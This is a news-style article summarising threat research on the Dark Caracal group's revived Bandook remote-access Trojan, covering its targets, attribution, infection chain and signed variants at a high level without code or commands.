A recently released report by Check Point Research reveals a resurgence of cyberattacks linked to a cyberespionage group said to be affiliated with the Kazakh and Lebanese governments. This group has revisited a 13-year-old backdoor Trojan, modifying it for current use against various sectors.
Known as Dark Caracal, the hackers have reportedly deployed numerous digitally signed variants of the Bandook Windows Trojan in their operations over the past year, effectively reigniting interest in this older malware family.
The group’s targets span a wide array of sectors, including government, finance, energy, food services, healthcare, education, IT, and legal institutions, operating across countries such as Chile, Cyprus, Germany, Indonesia, Italy, Singapore, Switzerland, Turkey, and the United States.
This expansive targeting suggests that the malware may not be developed solely for a single entity but is likely part of an offensive toolkit sold to various governments and threat actors around the globe. Researchers hypothesize that the malware is an element of a broader cybersecurity offensive infrastructure.
Dark Caracal’s use of the Bandook RAT for global espionage was first documented by the Electronic Frontier Foundation and Lookout in early 2018. The group has been implicated in the theft of proprietary corporate data and personally identifiable information across over 21 countries.
The group behind these operations is believed to be connected to the Lebanese General Directorate of General Security, which classifies it as an advanced persistent threat (APT) tied to nation-state activities. This connection implies sophisticated capabilities and resources typically associated with state-sponsored operations.
Recent reports indicate that Dark Caracal has re-emerged with an updated version of Bandook that includes measures to evade detection and analysis. This new variant employs a three-stage infection chain, beginning with a decoy Microsoft Word document packaged within a ZIP file. Upon opening, malicious macros are triggered to download a PowerShell script, which, in turn, retrieves encoded executable components hosted on cloud storage services like Dropbox or Bitbucket. Eventually, these components are used to inject the RAT into a new Internet Explorer process.
The Bandook RAT, commercially available since 2007, typically allows remote operators to issue commands ranging from capturing images to performing various file manipulations. However, the latest iteration seems to be a streamlined model, designed to execute only 11 commands, a significant reduction from its previous versions, which supported up to 120 commands. This suggests an operational shift aimed at minimizing the malware’s visibility during high-profile attacks.
The research also highlights that valid certificates from Certum were utilized to sign this modified version of the malware, demonstrating an evolving sophistication in the attackers’ tactics. Additionally, researchers identified further samples of digitally signed and unsigned variants, indicating that this malware could be marketed by a singular entity.
The insights gained from this incident provide valuable context for understanding potential tactics and techniques employed in these attacks, aligned with the MITRE ATT&CK framework. Initial access methods likely include the use of phishing techniques through the malicious document, while persistence may be achieved via the RAT’s ability to maintain connections to remote servers. Such revelations underscore the growing complexity and breadth of cyber threats facing various industries today.
